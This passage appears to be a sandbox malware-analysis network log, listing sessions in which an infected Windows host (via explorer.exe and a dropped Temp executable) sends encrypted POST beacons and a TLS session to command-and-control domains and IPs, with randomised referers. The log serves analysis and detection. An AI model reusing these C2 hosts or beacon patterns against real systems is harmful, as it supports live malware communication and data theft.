Feb 21, 2024 00:24:19.163199902 CET	204	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f4 c5 0d a9 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bOyz]lg\|}h%.j5&8z.%J5."[AU75:+yT'Z`j/~2\|cz
Feb 21, 2024 00:24:19.402755976 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49770	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:28.446100950 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hdcomaimwbbsqc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: selebration17io.io
Feb 21, 2024 00:24:28.446158886 CET	241	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ba db 20 d9 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bO 6ki#l\o FDWqyCWT=3.a=6H:TVwXV{DfF)fU=y8I_y:8>f1MWuAU{}R
Feb 21, 2024 00:24:28.680506945 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49773	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:39.541351080 CET	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frwlkmyukbxd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 110 Host: selebration17io.io
Feb 21, 2024 00:24:39.541388988 CET	110	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ad bd 1a bc Data Ascii: H;YWXr Vw#*kqD/jqJ,,P;}f=B!bO\|}\BOu#;o
Feb 21, 2024 00:24:39.764010906 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49774	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:40.452195883 CET	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wpbmtprveeaxdh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: sjyey.com
Feb 21, 2024 00:24:40.452238083 CET	244	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 01 a6 92 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vugaEja_ ei{/vgaD[ rhHF+~&_"[;D_4S"CvcK\+f/\|0
Feb 21, 2024 00:24:41.295572042 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:24:40 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49780	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:51.738416910 CET	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ashmoiuhqxsn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: selebration17io.io
Feb 21, 2024 00:24:51.738416910 CET	330	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e1 d1 12 cb Data Ascii: H;YWXr Vw#*kqD/jqJ,,P;}f=B!bO7,%5jkr=VT7TD'"Td'\|{MJGM-:]Y,1MenJ"rkqfV<z\eJ>yTi$l@
Feb 21, 2024 00:24:51.956800938 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:24:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49782	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:53.424372911 CET	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jinemgyvlvdj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: sjyey.com
Feb 21, 2024 00:24:53.424525023 CET	345	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 44 ba a5 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vunD-qhg"h{;4c+W<oA]^@l?6Rr`Z l7{(CzRt$e!\|7F^bBEp_2elA91
Feb 21, 2024 00:24:54.518657923 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:24:53 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49784	171.25.193.9	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:24:58.342802048 CET	204	OUT	Data Raw: 16 03 01 00 c7 01 00 00 c3 03 03 94 5a 5e ed de 64 a2 75 d8 35 f0 0f bb a3 83 9d ed 43 8b 59 a6 42 e0 66 25 63 f7 46 ad 40 81 d4 00 00 1c c0 2b c0 2f c0 2c c0 30 c0 0a c0 09 c0 13 c0 14 00 33 00 39 00 2f 00 35 00 0a 00 ff 01 00 00 7e 00 00 00 25 Data Ascii: Z^du5CYBf%cF@+/,039/5~%# www.3u65yoxkxvmqooejukiateny.com#
Feb 21, 2024 00:24:58.528176069 CET	999	IN	Data Raw: 16 03 03 00 39 02 00 00 35 03 03 12 aa 5c c0 23 b6 c4 24 aa 53 c8 a2 5b 74 42 bb 7d 10 22 7e 87 31 f2 de 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 49 0b 00 02 45 00 02 42 00 02 3f 30 82 02 3b 30 Data Ascii: 95\#$S[tB}"~1DOWNGRD0IEB?0;070H010Uwww.onvmdd7ogn.com0231206000000Z240506000000Z010Uwww.fb7jbkcozor.net0"0H0
Feb 21, 2024 00:24:58.531414032 CET	126	OUT	Data Raw: 16 03 03 00 46 10 00 00 42 41 04 9a c3 81 a1 e6 70 31 dc c7 ee b1 12 31 9e b3 aa b0 94 07 0c c5 e9 0a c3 05 a5 39 af 9a e2 df 20 b7 b3 f3 bf 66 be 7f c4 69 93 f9 11 3f 90 bc b4 0f 45 94 71 cf 7a c9 ba 38 89 e5 53 f5 1b 93 8a 14 03 03 00 01 01 16 Data Ascii: FBAp119 fi?Eqz8S(,@agQIg_"x*#cjLxre
Feb 21, 2024 00:24:58.716578007 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 d6 08 03 b5 75 38 52 b2 db de b3 6a e9 25 c6 4e b9 ef 55 4a 4d 99 04 7f 83 89 7c 37 11 61 81 29 d9 96 41 b2 93 c1 6c 1c Data Ascii: (u8Rj%NUJM\|7a)Al
Feb 21, 2024 00:24:58.717039108 CET	40	OUT	Data Raw: 17 03 03 00 23 2c 40 c1 17 c6 61 1b 68 66 0d 2d 69 4f d7 3a c4 ac 5b 11 8f fc 83 65 07 e8 a5 65 d7 49 17 93 22 a3 bc a9 Data Ascii: #,@ahf-iO:[eeI"
Feb 21, 2024 00:24:58.902762890 CET	1286	IN	Data Raw: 17 03 03 07 fa d6 08 03 b5 75 38 52 b3 e3 0a 63 85 b5 f4 34 86 86 3e c5 ad 5a 92 8b 91 49 6a e8 90 7b d6 5e e6 7c 8d 39 f6 33 b9 93 b0 32 fc 08 5e fd 7d 17 33 e0 4f 4e 6a f2 92 78 43 d6 69 11 e9 d5 29 db 22 c3 d3 fc c3 b2 b0 8f 59 d3 0e 55 9b 30 Data Ascii: u8Rc4>ZIj{^\|932^}3ONjxCi)"YU0E5n`ujsv)^FxweY7B4^BX{VG'{tO([CMp-b<@j$4%<@oo\;E3}4:%2?5F2t,AH/Jv
Feb 21, 2024 00:24:58.902796030 CET	761	IN	Data Raw: 0d c5 b7 62 28 f6 6a 4c 15 d0 c5 0a 04 9b 17 a4 5d 84 8e 21 0e e2 02 16 79 9c 3f 14 43 03 16 60 47 55 3e 68 16 e4 e5 f3 8d c9 62 a6 ba 2b a0 8b dc 3d f4 67 2a 7a 64 f7 19 0b 4b 25 14 d1 5d 13 30 65 49 02 99 d2 d6 ae 44 e8 d8 ec cf 7d bc c9 83 5e Data Ascii: b(jL]!y?C`GU>hb+=gzdK%]0eID}^A$OXZxlO-3^i?.dE2~VPDslkb$d"I+!Fd.8[J#t>ib^WCs`#'gpbbrwl{,.H,lJijq\|%% CD<h
Feb 21, 2024 00:24:58.908391953 CET	1057	OUT	Data Raw: 17 03 03 04 1c 2c 40 c1 17 c6 61 1b 69 2d 61 dd 3a 0b fd b7 fa 26 5b 25 0a 81 61 7f 28 6f d2 d0 36 95 c5 fa c4 04 6c 35 50 95 ec c7 b1 02 dc 10 7e 66 d5 6b 03 2f 05 42 00 48 f5 ca 58 23 bc 47 39 56 d2 ae da 78 19 19 29 c3 ab f4 d2 c4 16 12 11 87 Data Ascii: ,@ai-a:&[%a(o6l5P~fk/BHX#G9Vx)&:t1@6DZfFLxxLK1N7!_p{9(YjLXJe@I14<sKUA\@-b_igqq=M2`s\d\|:dIk*@d
Feb 21, 2024 00:24:59.094300032 CET	543	IN	Data Raw: 17 03 03 02 1a d6 08 03 b5 75 38 52 b4 3d af 82 d0 b3 cd 32 56 03 45 0d 48 e1 07 be bd e1 4d 81 58 89 63 88 50 e0 7d a5 3b 5a e3 ee a3 05 5b 3f 50 80 26 3c 97 be 2e 15 2e eb d3 6b 87 66 37 87 c7 d6 7c 93 ce bf 78 78 e3 a2 6e ed 1f 22 b5 11 44 5b Data Ascii: u8R=2VEHMXcP};Z[?P&<..kf7\|xxn"D[9.CpQ_TE\6V[4GTBljre{7}e<NV-\qpxe2h!{uyEIvN,TYNpe2aZt#)cRu
Feb 21, 2024 00:24:59.094836950 CET	1057	OUT	Data Raw: 17 03 03 04 1c 2c 40 c1 17 c6 61 1b 6a d8 9a d7 eb e1 75 02 c0 96 ba 28 b0 4b 80 17 6a 44 31 e9 89 a6 d8 90 36 71 04 7d 15 b7 66 97 92 62 b0 e3 b3 84 e8 f0 a7 fd 15 9f 66 d3 3d db d3 cd 42 86 3b d8 29 67 b7 5b 4f 2f c4 75 df a1 80 2f 24 92 a9 5d Data Ascii: ,@aju(KjD16q}fbf=B;)g[O/u/$]Z[ !NLQbUYBA['\| /&,@q<rK/\|l!7>qSk,33QAeW~qJsKuDC+YMtQT1j

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49785	185.196.8.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:00.311323881 CET	318	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1 Host: bvstlyb.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 21, 2024 00:25:00.537938118 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 20 Feb 2024 23:25:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49786	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:04.314907074 CET	287	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmnuclxpjckjuyq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: selebration17io.io
Feb 21, 2024 00:25:04.314908028 CET	240	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a0 d6 34 a5 Data Ascii: H;YWXr Vw#*kqD/jqJ,,P;}f=B!bO4yqJ{_nI^>h0/n-.Sn^6nPrH)c&R__V_K a6o@7o#aYKx#%kH$/+dBP^
Feb 21, 2024 00:25:04.548541069 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:25:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49787	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:04.414963961 CET	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lsckaqywvhcwxr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: sjyey.com
Feb 21, 2024 00:25:04.414997101 CET	292	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 3f fb bf Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vu<?]8lxT"SqN)(\|aO>h_ZC[1pg/Ectn~`6h!zQbR"kWiis\.#zE$E:1
Feb 21, 2024 00:25:05.535602093 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:25:04 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49791	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:17.514319897 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://srvjnognnjjqc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: selebration17io.io
Feb 21, 2024 00:25:17.514353037 CET	285	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9e c5 53 b0 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bOS6cPme`z^7`Ep.`OcAts;6;Mt?g8&`^'+G5#n#W;TA42{_\'F5m\|
Feb 21, 2024 00:25:17.741442919 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:25:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49790	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:17.581262112 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dtlxqtnkjrmqpli.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: sjyey.com
Feb 21, 2024 00:25:17.581305981 CET	262	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 29 d2 8f Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vuP)u`kwr$`S, t"?u8PQJ=:9:QC(Ft>DAPr;1W/>8mRw*Q\|B k
Feb 21, 2024 00:25:18.430636883 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:25:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49792	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:29.403027058 CET	288	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aqrcjsxbrdnmgfud.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: selebration17io.io
Feb 21, 2024 00:25:29.403062105 CET	241	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e0 ba 18 e1 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bO?q$zt_0M?G\@PO}2Nw>;n,buR<h0m1%*qeKS0\'d?Rw(m`X/uk
Feb 21, 2024 00:25:29.633135080 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:25:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49794	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:30.168792963 CET	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxqvjhdkwrjy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: sjyey.com
Feb 21, 2024 00:25:30.168862104 CET	343	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 33 d3 80 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vu]3b0VUvY=IM=q?dz_T)3VE.`&%6~]Na,"?rCG7$`&&NMSGl=XUt
Feb 21, 2024 00:25:31.012976885 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:25:30 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49795	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:42.137532949 CET	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://onstoqiexcmkx.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: selebration17io.io
Feb 21, 2024 00:25:42.137573004 CET	330	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 b8 ae 32 a1 Data Ascii: H;YWXr Vw#kqD/jqJ,,P;}f=B!bO2u#Z2<k{-+/#_<< ZiB/3 CVJ,@LN\jdf]o RvXV2g.mraRG=:HX/K
Feb 21, 2024 00:25:42.370203972 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:25:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49797	211.181.24.133	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:43.910537958 CET	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://veqijasajwy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: sjyey.com
Feb 21, 2024 00:25:43.910567999 CET	361	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 4f fd e8 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vusOePGy~{dQK a42s()YZ/:7&.)pE*na[QT<L4JaJOt9}KO,WF=^9='[6
Feb 21, 2024 00:25:44.763856888 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:25:44 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49799	91.215.85.120	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:50.859606981 CET	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qpbqyfrqjmdtwe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: selebration17io.io
Feb 21, 2024 00:25:50.859765053 CET	329	OUT	Data Raw: 48 9d 8b c8 3b 13 59 57 58 72 20 56 77 df 23 c1 2a 6b eb 12 8e 1b aa dd b2 1a a5 80 00 f1 a7 91 8f ab 80 c5 71 44 e0 c3 a2 2f 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 95 bd 45 bb Data Ascii: H;YWXr Vw#*kqD/jqJ,,P;}f=B!bOE:"RDG>yE1'+^!+fzH:JQ^4k?lg\|F2w,W~x=j$S`QP%Gg6!Ji\|
